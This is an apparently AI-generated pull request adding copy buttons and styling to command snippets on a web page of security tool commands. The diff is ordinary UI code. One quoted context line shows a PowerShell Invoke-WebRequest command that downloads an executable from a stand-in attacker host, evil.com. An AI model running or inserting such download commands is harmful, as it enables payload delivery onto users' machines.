### PR TITLE
🎨 Palette: Add copy-to-clipboard buttons for tool commands

### DIFF
--- a/.Jules/palette.md
+++ b/.Jules/palette.md
@@ -9,3 +9,7 @@
 ## 2026-02-14 - Keyboard Shortcut Discoverability
 **Learning:** Adding keyboard shortcuts (like '/' for search) significantly improves power-user experience, but they are useless if invisible. Updating the placeholder text to include the shortcut (e.g., "Press '/'") is a simple, zero-layout-shift way to boost discoverability.
 **Action:** Always pair keyboard shortcuts with a visual indicator, such as a tooltip or placeholder text, to ensure users know they exist.
+
+## 2026-02-14 - Retrofitting Copy Interactions
+**Learning:** Static documentation often contains command snippets that users manually select and copy. Adding a dedicated 'Copy' button significantly reduces friction for technical users.
+**Action:** Identify repetitive patterns in documentation (like code blocks) and enhance them with client-side DOM manipulation to add utility controls.

--- a/css/style.css
+++ b/css/style.css
@@ -404,3 +404,44 @@ code {
     grid-column: 1 / -1;
     font-size: 1.1rem;
 }
+
+/* Copy Button */
+.command-wrapper {
+    display: flex;
+    justify-content: space-between;
+    align-items: center;
+    background: rgba(0,0,0,0.2);
+    border-radius: 4px;
+    padding: 0.5rem;
+    margin: 0.5rem 0;
+    border: 1px solid var(--border-color);
+}
+
+.command-code {
+    font-family: ui-monospace, SFMono-Regular, monospace;
+    color: var(--text-color);
+    margin-right: 1rem;
+    background: transparent;
+    border: none;
+    padding: 0;
+}
+
+.copy-btn {
+    background: transparent;
+    border: 1px solid var(--border-color);
+    color: var(--text-color);
+    cursor: pointer;
+    padding: 0.3rem 0.6rem;
+    border-radius: 4px;
+    font-size: 0.9rem;
+    transition: all 0.2s;
+    display: flex;
+    align-items: center;
+    justify-content: center;
+}
+
+.copy-btn:hover {
+    background: var(--accent-color);
+    color: #0d1117;
+    border-color: var(--accent-color);
+}

--- a/tools.html
+++ b/tools.html
@@ -426,6 +426,55 @@ Invoke-WebRequest -Uri "http://evil.com/file.exe" -OutFile "C:\Temp\file.exe"
             searchInput.focus();
         }
     });
+
+    // Add Copy Buttons to Flags
+    document.querySelectorAll('.tool-flags').forEach(flagsContainer => {
+        const fragment = document.createDocumentFragment();
+
+        flagsContainer.childNodes.forEach(node => {
+            if (node.nodeType === Node.TEXT_NODE && node.textContent.trim()) {
+                const commandText = node.textContent.trim();
+
+                const wrapper = document.createElement('div');
+                wrapper.className = 'command-wrapper';
+
+                const code = document.createElement('code');
+                code.className = 'command-code';
+                code.textContent = commandText;
+
+                const btn = document.createElement('button');
+                btn.className = 'copy-btn';
+                btn.ariaLabel = 'Copy command';
+                btn.innerHTML = '📋';
+                btn.title = 'Copy to clipboard';
+
+                btn.onclick = () => {
+                    navigator.clipboard.writeText(commandText).then(() => {
+                        btn.innerHTML = '✅';
+                        setTimeout(() => btn.innerHTML = '📋', 2000);
+                    }).catch(err => {
+                        console.error('Failed to copy: ', err);
+                        // Fallback?
+                        btn.innerHTML = '❌';
+                        setTimeout(() => btn.innerHTML = '📋', 2000);
+                    });
+                };
+
+                wrapper.appendChild(code);
+                wrapper.appendChild(btn);
+                fragment.appendChild(wrapper);
+            } else {
+                // Keep element nodes (e.g. strong tags)
+                // Also keep whitespace if needed? No, block elements handle layout.
+                if (node.nodeType === Node.ELEMENT_NODE) {
+                    fragment.appendChild(node.cloneNode(true));
+                }
+            }
+        });
+
+        flagsContainer.innerHTML = '';
+        flagsContainer.appendChild(fragment);
+    });
   </script>
 </body>
 </html>


### PR DESCRIPTION
Implemented a micro-UX improvement on the Tools page (`tools.html`) by adding "Copy" buttons to all command-line snippets.

**Changes:**
- **JavaScript:** Added logic to `tools.html` that parses the existing `.tool-flags` sections. It identifies command text nodes, wraps them in a semantic `.command-wrapper`, and appends a functional copy button.
- **CSS:** Added styles in `css/style.css` for `.command-wrapper`, `.command-code`, and `.copy-btn`, ensuring they blend seamlessly with the existing dark theme.
- **Accessibility:** Buttons include `aria-label="Copy command"` and provide visual feedback (icon change) upon successful copy.

**Verification:**
- Verified manually with a Playwright script (`verification/copy_button.png`) that confirms the buttons appear, are clickable, and successfully copy text to the clipboard.
- Confirmed that the layout remains consistent and responsive.

---
*PR created automatically by Jules for task [15562666652361495394](https://jules.google.com/task/15562666652361495394) started by @PietjePuh*